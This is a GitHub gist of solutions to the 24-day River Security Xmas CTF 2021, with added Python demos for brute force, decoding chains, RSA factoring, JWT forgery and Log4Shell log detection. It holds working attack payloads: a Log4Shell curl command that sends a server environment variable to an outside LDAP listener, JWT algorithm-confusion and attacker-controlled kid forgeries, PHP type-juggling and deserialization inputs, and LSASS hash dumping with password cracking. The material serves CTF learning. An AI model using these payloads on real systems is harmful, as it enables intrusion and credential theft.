@Bentis
Last active December 29, 2021 11:52
RSXC 2021

RSXC.no

Solutions for River Security Xmas Challenge (RSXC) 2021

Challenges were available on http://rsxc.no

Day 1:

Solution: nmap -p30000-31000 rsxc.no

$ nc rsxc.no 30780
RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}

RSXC{Congrats!You_found_the_secret_port_I_was_trying_to_hide!}

Day 2:

Solution: brute force the single byte (0x00-0xff) with a python script, one connection per candidate; the magic byte is 0xd4:

$ echo -en "\xd4" | nc rsxc.no 20002
RSXC{You_found_the_magic_byte_I_wanted_Good_job!}

RSXC{You_found_the_magic_byte_I_wanted_Good_job!}
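Added example, not the gist author's script: the brute force as a connection-per-candidate loop. The service in the block is a constructed stand-in for rsxc.no:20002 that only answers with a flag for one byte; the real service's reply format is not on the page, so the "looks like a flag" marker is an assumption.

```python
import socket
import threading

# Constructed stand-in for the challenge service: it reads one byte and answers
# with the flag only when that byte is the magic value, then closes.
DEMO_FLAG = b"RSXC{constructed_demo_flag}\n"
MAGIC_BYTE = 0xD4

def _serve(listener: socket.socket) -> None:
    while True:
        conn, _ = listener.accept()
        with conn:
            data = conn.recv(1)
            conn.sendall(DEMO_FLAG if data == bytes([MAGIC_BYTE]) else b"Nope\n")

def start_demo_server() -> int:
    """Start the stand-in service on an ephemeral loopback port; return the port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(16)
    threading.Thread(target=_serve, args=(listener,), daemon=True).start()
    return listener.getsockname()[1]

def find_magic_byte(host: str, port: int, marker: bytes = b"RSXC{"):
    """One fresh connection per candidate byte (the service answers once and
    closes); stop at the first reply that looks like a flag.
    Returns (byte, reply) or None. The marker is an assumption."""
    for candidate in range(256):
        with socket.create_connection((host, port), timeout=3) as s:
            s.sendall(bytes([candidate]))
            reply = s.recv(4096)
        if reply.startswith(marker):
            return candidate, reply
    return None

if __name__ == "__main__":
    port = start_demo_server()
    print(find_magic_byte("127.0.0.1", port))   # (212, b'RSXC{constructed_demo_flag}\n')
```

Against the real service you would replace the loopback host and port with rsxc.no:20002; the timeout matters there, because a service that stays silent on a wrong byte would otherwise hang the loop.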

Day 3:

Hint from discord: cyber chef
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base58('rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz',true)Bzip2_Decompress(false)From_Base85('!-u')From_Morse_Code('Space','Line%20feed')From_Hex('Auto')From_Base32('A-Z2-7%3D',false)

Decoding chain (the CyberChef recipe above, applied in this order): data -> From Base64 -> From Base58 (Ripple alphabet) -> Bzip2 decompress -> From Base85 -> From Morse code -> From Hex -> From Base32 ->

RSXC{I_hope_you_used_cyber_chef_it_does_make_it_alot_easier}
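Added example, not from the gist: the same decode chain in Python, useful when CyberChef is not at hand or the blob is large. The encoded input is constructed inside the block by running the inverse chain on a sample flag, because the challenge's data is not on the page; the Ripple Base58 alphabet is the one in the recipe URL, and CyberChef's '!-u' Base85 alphabet is plain ASCII85.

```python
import base64
import bz2

RIPPLE_B58 = "rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz"

def b58encode(data: bytes, alphabet: str = RIPPLE_B58) -> str:
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = alphabet[r] + out
    # each leading zero byte is represented by the alphabet's first character
    pad = len(data) - len(data.lstrip(b"\x00"))
    return alphabet[0] * pad + out

def b58decode(text: str, alphabet: str = RIPPLE_B58) -> bytes:
    n = 0
    for ch in text:
        n = n * 58 + alphabet.index(ch)
    pad = len(text) - len(text.lstrip(alphabet[0]))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * pad + body

# Morse table for the characters a hex string can contain
MORSE = {"0": "-----", "1": ".----", "2": "..---", "3": "...--", "4": "....-",
         "5": ".....", "6": "-....", "7": "--...", "8": "---..", "9": "----.",
         "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-."}
MORSE_REV = {v: k for k, v in MORSE.items()}

def morse_encode(text: str) -> str:      # letters separated by spaces, as in the recipe
    return " ".join(MORSE[c] for c in text.upper())

def morse_decode(text: str) -> str:
    return "".join(MORSE_REV[sym] for sym in text.split())

def encode_chain(flag: bytes) -> str:
    """flag -> Base32 -> Hex -> Morse -> Base85 -> Bzip2 -> Base58 -> Base64
    (the inverse of the recipe; used here only to construct test input)."""
    step = base64.b32encode(flag)
    step = step.hex().encode()                  # hex of the base32 text
    step = morse_encode(step.decode()).encode()
    step = base64.a85encode(step)               # '!-u' alphabet == ASCII85
    step = bz2.compress(step)
    step = b58encode(step).encode()
    return base64.b64encode(step).decode()

def decode_chain(blob: str) -> bytes:
    """The CyberChef recipe from the write-up, layer by layer."""
    step = base64.b64decode(blob)               # From_Base64
    step = b58decode(step.decode())             # From_Base58 (Ripple alphabet)
    step = bz2.decompress(step)                 # Bzip2_Decompress
    step = base64.a85decode(step)               # From_Base85
    step = morse_decode(step.decode())          # From_Morse_Code
    step = bytes.fromhex(step)                  # From_Hex
    return base64.b32decode(step)               # From_Base32

SAMPLE = encode_chain(b"RSXC{constructed_sample_flag}")   # constructed test input
```

When a layer fails to decode, the usual culprits are an alphabet mismatch (Base58 has several) and missing padding on the Base32 or Base64 layer; checking for magic bytes between layers (here "BZh" before the Bzip2 step) tells you which layer you are at.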

Day 4:

Known plaintext: the flag prefix RSXC.
XOR the ciphertext with the known prefix byte by byte; each ciphertext byte XOR its plaintext byte gives one key byte: 0x88 0xc5 0x54 0xd5 (4 bytes)
Use this key cyclically (repeating-key XOR) on the whole input:

RSXC{Most_would_say_XOR_isn't_that_useful_anymore}

Day 5:

PCAP file, open in Wireshark.
Identify the TCP stream of an IRC connection; it carries the hint:
"What about encrypting a zip file containing the flag? Let's say a 10 digit long number above 9 954 000 000 as the password?"
Identify the FTP transfer of flag.zip and extract it to a file.

Brute force the password with a python script over the hinted range (10-digit numbers above 9 954 000 000, so about 46 million candidates).
Found password: 9954359864
Extracting flag.txt gives:

RSXC{Good_job_analyzing_the_pcap_did_you_see_the_hint?}
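Added example, not the gist author's script: a numeric-range brute force against a ZipCrypto-protected archive using only the standard zipfile module. Since zipfile can read but not write encrypted archives, the block also builds a small ZipCrypto-encrypted archive in memory (the encryption side of the algorithm zipfile's decrypter implements); the archive, file name and password are constructed, the challenge's own flag.zip is not on the page.

```python
import io
import struct
import zipfile
import zlib

def _crc_entry(i: int) -> int:
    for _ in range(8):
        i = (i >> 1) ^ 0xEDB88320 if i & 1 else i >> 1
    return i

_CRCTABLE = [_crc_entry(i) for i in range(256)]

def zipcrypto_encrypt(pwd: bytes, plaintext: bytes, crc: int) -> bytes:
    """Traditional PKWARE (ZipCrypto) encryption, the mirror image of zipfile's
    decrypter. Returns the 12-byte encryption header followed by the payload."""
    keys = [0x12345678, 0x23456789, 0x34567890]

    def update(c: int) -> None:
        keys[0] = (keys[0] >> 8) ^ _CRCTABLE[(keys[0] ^ c) & 0xFF]
        keys[1] = (keys[1] + (keys[0] & 0xFF)) & 0xFFFFFFFF
        keys[1] = (keys[1] * 134775813 + 1) & 0xFFFFFFFF
        keys[2] = (keys[2] >> 8) ^ _CRCTABLE[(keys[2] ^ (keys[1] >> 24)) & 0xFF]

    for p in pwd:
        update(p)
    # 11 filler bytes (random in real archives) plus the CRC's high byte. zipfile
    # checks that last byte first, so 255 of 256 wrong passwords are rejected
    # without touching the data; the remaining 1/256 fail the CRC check instead.
    header = b"\x00" * 11 + bytes([(crc >> 24) & 0xFF])
    out = bytearray()
    for c in header + plaintext:
        k = keys[2] | 2
        out.append(c ^ (((k * (k ^ 1)) >> 8) & 0xFF))
        update(c)                       # key schedule advances on the plaintext byte
    return bytes(out)

def build_encrypted_zip(name: bytes, data: bytes, pwd: bytes) -> bytes:
    """Minimal single-member,, stored (uncompressed), ZipCrypto-encrypted archive."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    body = zipcrypto_encrypt(pwd, data, crc)
    flags, method, dostime, dosdate = 0x0001, 0, 0, 0x0021   # bit 0: encrypted; 1980-01-01
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, method, dostime,
                        dosdate, crc, len(body), len(data), len(name), 0) + name
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, method,
                          dostime, dosdate, crc, len(body), len(data), len(name),
                          0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                       len(local) + len(body), 0)
    return local + body + central + eocd

def crack_numeric_password(archive: bytes, member: str, start: int, stop: int):
    """Try every integer in [start, stop) as the password.
    Returns (password, plaintext) or None."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for n in range(start, stop):
            pwd = str(n).encode()
            try:
                return pwd.decode(), zf.read(member, pwd=pwd)
            except (RuntimeError, zipfile.BadZipFile):
                continue   # check byte (RuntimeError) or CRC (BadZipFile) mismatch

# Constructed demo archive; the challenge's own password was 9954359864.
DEMO_PASSWORD = b"9954000137"
DEMO_ARCHIVE = build_encrypted_zip(b"flag.txt", b"RSXC{constructed_demo_flag}\n", DEMO_PASSWORD)

def demo():
    # the IRC hint bounds the search to 10-digit numbers above 9 954 000 000
    return crack_numeric_password(DEMO_ARCHIVE, "flag.txt", 9_954_000_001, 10_000_000_000)
```

Pure Python manages a few hundred thousand candidates per second on this path, which is fine for the 46 million of the hint but slow in general; zip2john plus john, or hashcat mode 17200/17225, do the same check on hashes, and if any member's plaintext is known, bkcrack recovers the ZipCrypto keys without guessing the password at all.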

Day 6:

Vigenère cipher
Manually brute-forcing the key until the known prefix RSXC appears gives the first four key letters: YMZH
Through trial and error the next key letter is: G
Full key YMZHG ->

RSXC{isthisnotjustafancycaesarcipher}
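Added example, not the gist author's scripts, covering both Day 4 and Day 6: recovering a repeating key from a known plaintext prefix, for byte-wise XOR and for Vigenère. The known prefix fixes the first key positions; the remaining positions are found by brute force and scored against a tiny wordlist, which replaces the manual trial and error. The ciphertexts are reconstructed from the flags and keys given in the write-up (the challenge files are not on the page); the assumption that non-letters pass through Vigenère unchanged without consuming a key position is mine.

```python
from itertools import cycle, product
from string import ascii_lowercase as LOWER, ascii_uppercase as UPPER

# ---- Day 4: repeating-key XOR -------------------------------------------------
def xor_cycle(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def recover_xor_key(ct: bytes, known: bytes):
    """ct XOR known gives the key stream for the known positions; the shortest
    period of that stream which also decrypts to printable ASCII is the key."""
    stream = xor_cycle(ct[:len(known)], known)
    for period in range(1, len(stream) + 1):
        key = stream[:period]
        if xor_cycle(stream, key) == bytes(len(stream)):   # stream is periodic with this key
            pt = xor_cycle(ct, key)
            if all(32 <= b < 127 for b in pt):
                return key, pt
    return None

# ---- Day 6: Vigenère ----------------------------------------------------------
def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    out, i = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            alpha = UPPER if ch.isupper() else LOWER
            shift = UPPER.index(key[i % len(key)].upper())
            if decrypt:
                shift = -shift
            out.append(alpha[(alpha.index(ch) + shift) % 26])
            i += 1
        else:
            out.append(ch)   # assumption: punctuation passes through, key does not advance
    return "".join(out)

def recover_vigenere_key(ct: str, known: str, words, max_keylen: int):
    """The known prefix fixes the first len(known) key letters (cipher letter minus
    plain letter, mod 26). Every longer key length up to max_keylen is tried and
    the remaining letters brute-forced; the decryption with most wordlist hits wins."""
    ct_letters = [c for c in ct if c.isalpha()][:len(known)]
    prefix = "".join(UPPER[(UPPER.index(c.upper()) - UPPER.index(p.upper())) % 26]
                     for c, p in zip(ct_letters, known))
    best = (-1, None, None)
    for keylen in range(len(known), max_keylen + 1):
        for tail in product(UPPER, repeat=keylen - len(known)):
            key = prefix + "".join(tail)
            pt = vigenere(ct, key, decrypt=True)
            score = sum(w in pt.lower() for w in words)
            if score > best[0]:
                best = (score, key, pt)
    return best[1], best[2]

# Reconstructed from the write-up's keys and flags (the challenge files are not on the page).
XOR_KEY = bytes.fromhex("88c554d5")
XOR_CT = xor_cycle(b"RSXC{Most_would_say_XOR_isn't_that_useful_anymore}", XOR_KEY)
VIG_CT = vigenere("RSXC{isthisnotjustafancycaesarcipher}", "YMZHG")
WORDS = ("this", "not", "just", "fancy", "caesar", "cipher")   # stand-in for a real wordlist

def demo():
    return recover_xor_key(XOR_CT, b"RSXC"), recover_vigenere_key(VIG_CT, "RSXC", WORDS, 6)
```

The wordlist scoring is what turns "trial and error" into a decision rule: a wrong last key letter garbles every fifth letter, so every word spanning one of those positions disappears, and only the right key keeps all of them.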

Day 7:

The EXIF data contains an embedded thumbnail; extract it:

$ exif -e 07-challenge.jpg
Wrote file '07-challenge.jpg.modified.jpeg'

thumbnail contains flag:

RSXC{Sometimes_metadata_hides_stuff}

Day 8:

Decrement the note ID in the URL (an insecure direct object reference) to find the hidden note with the flag:

http://rsxc.no:20008/notes.php?id=0

RSXC{Remember_to_secure_your_direct_object_references}

Day 9:

Note IDs are MD5 hashes of predictable names:
"note0" -> 65b29a77142a5c237d7b21c005b72157
"flag" -> 327a6c4304ad5938eaf0efb6cc3e53dc -> http://rsxc.no:20009/notes.php?id=327a6c4304ad5938eaf0efb6cc3e53dc

RSXC{MD5_should_not_be_used_for_security.Especially_not_with_known_plaintext}

Day 10:

Server sends a Flag HTTP header:

RSXC{Sometimes_headers_can_tell_you_something_useful}

Day 11:

q is derived from p*p, so n = p*q lies just above p**3. Take the integer cube root of n and walk downwards over the previous primes (prevprime) until one divides n; that is p, q = n // p follows, and with d = e**-1 mod (p-1)(q-1) the ciphertext decrypts to:

RSXC{Good_Job!I_see_you_know_how_to_do_some_math_and_how_rsa_works}
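Added example, not the gist author's solver, with no external library: the cube-root attack worked through in plain Python. The key pair is generated inside the block from a chosen p, assuming q = nextprime(p*p), which is how I read "q is selected based on p*p"; the challenge's real n, e and ciphertext are not on the page.

```python
from math import gcd

def is_probable_prime(n: int) -> bool:
    """Miller-Rabin; deterministic for n < 3.3e24 with these bases."""
    if n < 2:
        return False
    small = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    if n in small:
        return True
    if any(n % p == 0 for p in small):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in small:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def next_prime(n: int) -> int:
    n += 1
    while not is_probable_prime(n):
        n += 1
    return n

def prev_prime(n: int) -> int:
    n -= 1
    while not is_probable_prime(n):
        n -= 1
    return n

def icbrt(n: int) -> int:
    """Largest integer r with r**3 <= n (binary search, exact for big ints;
    float cube roots lose precision long before RSA sizes)."""
    lo, hi = 0, 1 << (n.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

def recover_factors(n: int):
    """q > p*p means n > p**3, so p is the largest prime at or below cbrt(n)
    that divides n; the walk is short because q - p*p is a tiny prime gap."""
    p = icbrt(n)
    if not is_probable_prime(p):
        p = prev_prime(p)
    while n % p:
        p = prev_prime(p)
    return p, n // p

def rsa_decrypt(n: int, e: int, c: int) -> int:
    p, q = recover_factors(n)
    d = pow(e, -1, (p - 1) * (q - 1))
    return pow(c, d, n)

# Constructed key pair in the challenge's shape: pick p, derive q = nextprime(p*p).
P = next_prime(1 << 40)          # a small p so the demo runs instantly
Q = next_prime(P * P)
N = P * Q
E = next(e for e in (65537, 257, 17, 5, 3) if gcd(e, (P - 1) * (Q - 1)) == 1)
MESSAGE = int.from_bytes(b"RSXC{demo}", "big")   # 80 bits, well below the ~120-bit N

def demo():
    c = pow(MESSAGE, E, N)                          # what the challenge hands out
    return recover_factors(N), rsa_decrypt(N, E, c).to_bytes(10, "big")
```

The same idea covers any generation rule that ties q to p: whenever q = f(p) with f known, n = p * f(p) is a single-variable equation and p sits within a few primes of the corresponding root of n.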

Day 12:

Read the "encoding" and the input from the socket, apply the requested operation and send the result back. Repeat 100 times within 12 seconds:

RSXC{Seems_like_you_have_a_knack_for_encoding_and_talking_to_servers!}

Day 13:

React web app.
The bundled source file Todos.js contains a base64 encoded string; decoding it gives the flag:

RSXC{it_might_be_there_even_if_you_don't_include_it!}

Day 14:

The server sets a JWT with algorithm "RS256" and a payload with username "test".
The public key is available for verification.
Changing the algorithm to "HS256" and signing with that public key as the HMAC secret also produces a JWT the server accepts (algorithm confusion).
Changing the username to "admin" then reveals the flag:

RSXC{You_have_to_remember_to_limit_what_algorithms_are_allowed}

Day 15:

Modifying the key ID (kid) header lets us point the server at a public key URL we control. We sign the token with the matching private key and the server validates it with our key.
Modifying kid and the username in the payload gives the flag:

RSXC{Don't_let_others_decide_where_your_keys_are_located}
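Added example, not the challenge's server code, covering Day 14 and Day 15 together: a toy JWT issuer with a vulnerable and a fixed verifier for each mistake (algorithm taken from the token and one key string reused for both RS256 and HS256; kid resolved to an arbitrary URL). To run offline the RSA is textbook RSA over two well-known Mersenne primes (fine for demonstrating the JWT logic, useless as real keys), the key store is a dict standing in for HTTP fetches of kid URLs, and the key text format, the URLs and the payloads are all constructed.

```python
import base64
import hashlib
import hmac
import json

def toy_rsa_keypair(p: int, q: int):
    """Returns (private (d, n), public 'n=<hex>;e=<hex>' string). Mersenne primes
    keep this runnable without a library; never use them for real keys."""
    n, e = p * q, 65537
    return (pow(e, -1, (p - 1) * (q - 1)), n), f"n={n:x};e={e:x}"

def rsa_sign(data: bytes, priv) -> bytes:          # textbook RSA over SHA-256, no padding
    d, n = priv
    h = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return pow(h, d, n).to_bytes((n.bit_length() + 7) // 8, "big")

def rsa_verify(data: bytes, sig: bytes, pub: str) -> bool:
    n, e = (int(part.split("=")[1], 16) for part in pub.split(";"))
    h = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return pow(int.from_bytes(sig, "big"), e, n) == h

SERVER_PRIV, SERVER_PUB = toy_rsa_keypair((1 << 521) - 1, (1 << 127) - 1)
ATTACKER_PRIV, ATTACKER_PUB = toy_rsa_keypair((1 << 607) - 1, (1 << 89) - 1)

def b64u(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def b64u_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def make_jwt(header: dict, payload: dict, key) -> str:
    """key: HMAC secret bytes for HS256, or a toy private key (d, n) for RS256."""
    signing_input = b64u(json.dumps(header).encode()) + "." + b64u(json.dumps(payload).encode())
    if header["alg"] == "HS256":
        sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    else:
        sig = rsa_sign(signing_input.encode(), key)
    return signing_input + "." + b64u(sig)

def split_jwt(token: str):
    h, p, s = token.split(".")
    return json.loads(b64u_decode(h)), json.loads(b64u_decode(p)), (h + "." + p).encode(), b64u_decode(s)

# --- Day 14: algorithm confusion ------------------------------------------------
def verify_alg_from_token(token: str, key: str):
    """Vulnerable: the token picks the algorithm, and the same key string feeds both
    paths, so the published public key doubles as the HS256 secret."""
    header, payload, signing_input, sig = split_jwt(token)
    if header.get("alg") == "HS256":
        ok = hmac.compare_digest(sig, hmac.new(key.encode(), signing_input, hashlib.sha256).digest())
    elif header.get("alg") == "RS256":
        ok = rsa_verify(signing_input, sig, key)
    else:
        ok = False
    return payload if ok else None

def verify_pinned_rs256(token: str, key: str):
    """Fixed: the server, not the token, decides the algorithm."""
    header, payload, signing_input, sig = split_jwt(token)
    if header.get("alg") != "RS256":
        return None
    return payload if rsa_verify(signing_input, sig, key) else None

# --- Day 15: attacker-controlled kid ------------------------------------------------
KEY_STORE = {"https://rsxc.example/keys/server.pub": SERVER_PUB,     # constructed URLs
             "https://attacker.example/evil.pub": ATTACKER_PUB}
TRUSTED_KIDS = {"https://rsxc.example/keys/server.pub"}

def verify_kid_unrestricted(token: str):
    """Vulnerable: fetches whatever URL the token names in kid."""
    header, payload, signing_input, sig = split_jwt(token)
    pub = KEY_STORE.get(header.get("kid"))      # stands in for an HTTP GET of the kid URL
    return payload if pub and header.get("alg") == "RS256" and rsa_verify(signing_input, sig, pub) else None

def verify_kid_allowlisted(token: str):
    """Fixed: kid may only select among keys the server already trusts."""
    header, payload, signing_input, sig = split_jwt(token)
    if header.get("alg") != "RS256" or header.get("kid") not in TRUSTED_KIDS:
        return None
    return payload if rsa_verify(signing_input, sig, KEY_STORE[header["kid"]]) else None

def attacks():
    admin = {"username": "admin"}
    confused = make_jwt({"alg": "HS256", "typ": "JWT"}, admin, SERVER_PUB.encode())
    own_key = make_jwt({"alg": "RS256", "kid": "https://attacker.example/evil.pub"}, admin, ATTACKER_PRIV)
    return (verify_alg_from_token(confused, SERVER_PUB), verify_pinned_rs256(confused, SERVER_PUB),
            verify_kid_unrestricted(own_key), verify_kid_allowlisted(own_key))
```

Both fixes are the same shape: the verifier checks the untrusted header fields against a server-side allowlist before any cryptography runs, and the key it uses is chosen by the server's configuration, never by the token. With a real library that is the `algorithms=[...]` argument plus a fixed JWKS/key set rather than a fetch of whatever kid names.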

Day 16:

Obfuscated script. Deobfuscating it in several stages gives an invalid payload URL and a "hidden" base64 string which decodes to the flag:

RSXC{Don't_blindly_trust_obfuscated_code_it_might_do_something_bad}

Day 17:

PHP source available. Files are read based on unserialized user input.
Craft a serialized object of the Card class: O:4:"Card":1:{s:4:"file";s:8:"flag.txt";}
Pass it base64 encoded as the card GET parameter and flag.txt is read:

RSXC{Care_needs_to_be_taken_with_user_supplied_input.It_should_never_be_trusted}

Day 18:

Unpack the docker image repository. Locate the previous layer in which the file is still intact, extract it and voilà:

RSXC{Now_you_know_that_docker_images_are_like_onions.They_have_many_layers}

Day 19:

Another include with the filename taken from the URL.
Just pass base64('flag.txt') as the card parameter in the URL and get the flag:

RSXC{It_is_not_smart_to_let_people_include_whatever_they_want}

Day 20:

The PHP code provided reads JSON (host and hmac) from the request body.
The parameters to hash_hmac are in the wrong order, which lets the supplied value choose the algorithm. We also have the key, but not the data parameter.
However, an invalid algorithm makes hash_hmac return false, and with PHP's loose comparison a supplied hmac of 0 compares equal to false:

$ curl -d '{"host":"none","hmac":0}' http://rsxc.no:20020/api.php
RSXC{You_have_to_have_the_right_order_for_arguments!}

RSXC{You_have_to_have_the_right_order_for_arguments!}

Day 21:

An LSASS.exe memory dump.
The password hash can be extracted with pypykatz:

== MSV ==
Username: river-security-xmas
Domain: DESKTOP-V1MQH3P
LM: NA
NT: 7801ee9c5762bb027ee224d54cb8f62e
SHA1: bebad302f8e64b59279c3a6747db0e076800d9ca

The challenge text mentions "rock our world", hinting at the RockYou dictionary (thanks google).
Running hashcat in NTLM mode (-m 1000) with the rockyou dictionary from Kali against the NT hash gives the password:

alliwantforchristmasisyou

Day 22:

The file is a wifi traffic capture of a WPA reauthentication (the 4-way handshake we need).
Once again the challenge text mentions "you rock", hinting at the rockyou.txt dictionary.
We filter the dictionary to passwords starting with S, as per the challenge text.
Then run aircrack-ng on the cap file with that wordlist,
which returns the key: Santaclaws99

Decrypting the capture file with airdecap-ng (using the recovered key) and opening it in Wireshark reveals a single TCP stream.
Following the stream gives the flag:

RSXC{WIFI_is_fun}

Day 23:

Scan the server with dirb, looking for a directory that holds flag.txt:

$ dirb http://rsxc.no:20023/ wordlists/big.txt -X /flag.txt
+ http://rsxc.no:20023/logfile/flag.txt (CODE:200|SIZE:120)

RSXC{Content_discovery_is_a_useful_to_know.Good_job_finding_the_flag}

Day 24:

The challenge text hints at logging, most likely the Log4j vulnerability (Log4Shell).
Experimenting with headers and ${jndi:...} lookups leads to an attack vector.

Since I don't want to install Java on my public-facing server, I ran JNDIExploit-1.2 locally
and port-forwarded a public-facing port to that. Then running the attack query:

$ curl rsxc.no:20024 -v -H "User-Agent: \${jndi:ldap://<REDACTEDIP>:8008/\${env:FLAG}}"

This leads to an LDAP query received by the listener; the nested ${env:FLAG} lookup was resolved on the server first, so the environment variable arrives in the request path:

[+] Received LDAP Query: base32_KJJVQQ33K5SV6ZDPL5WGS23FL5WG6Z3HNFXGOX3SNFTWQ5B7PU

which base32 decoded gives the flag:

RSXC{We_do_like_logging_right?}
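Added example, not part of the write-up, looking at the same attack from the defender's side: a detector for ${jndi:...} lookups in web logs that first collapses the common one-character obfuscations (${lower:j}, ${upper:J}, ${::-j}, ${env:NOPE:-j}) that hide the literal string, plus the decoding of the exfiltrated value as it appears in the listener output above. The log lines are constructed and the normalisation covers only those documented obfuscation forms, not every possible one.

```python
import base64
import re

# Each of these lookups resolves to one character; collapse them repeatedly so a
# nested "${${lower:j}ndi:" becomes the plain "${jndi:" before matching.
_CHAR_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}|\$\{[^{}]*:-([^{}])\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:")

def normalize(line: str) -> str:
    prev = None
    while prev != line:
        prev, line = line, _CHAR_LOOKUP.sub(lambda m: (m.group(1) or m.group(2)).lower(), line)
    return line.lower()

def is_log4shell_probe(line: str) -> bool:
    return _JNDI.search(normalize(line)) is not None

def decode_jndiexploit_exfil(path: str) -> bytes:
    """The listener logs the requested LDAP base; after the base32_ prefix comes the
    server-side value of the nested ${env:...} lookup, without '=' padding."""
    data = path.split("base32_", 1)[1]
    return base64.b32decode(data + "=" * (-len(data) % 8))

# Constructed access-log lines in the shape a Java web app behind Log4j would log.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:8008/${env:FLAG}}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://203.0.113.7/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/b}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:ldap://203.0.113.7/c}"',
    '10.0.0.2 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

def flagged_lines(lines=SAMPLE_LOG):
    """Indices of the lines carrying a JNDI lookup after normalisation."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]
```

The point of the normalisation step is that a literal "${jndi:" signature misses three of the four probes above; a detector that does not resolve the lookup syntax the way Log4j does will be bypassed the same way the WAFs were in December 2021.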
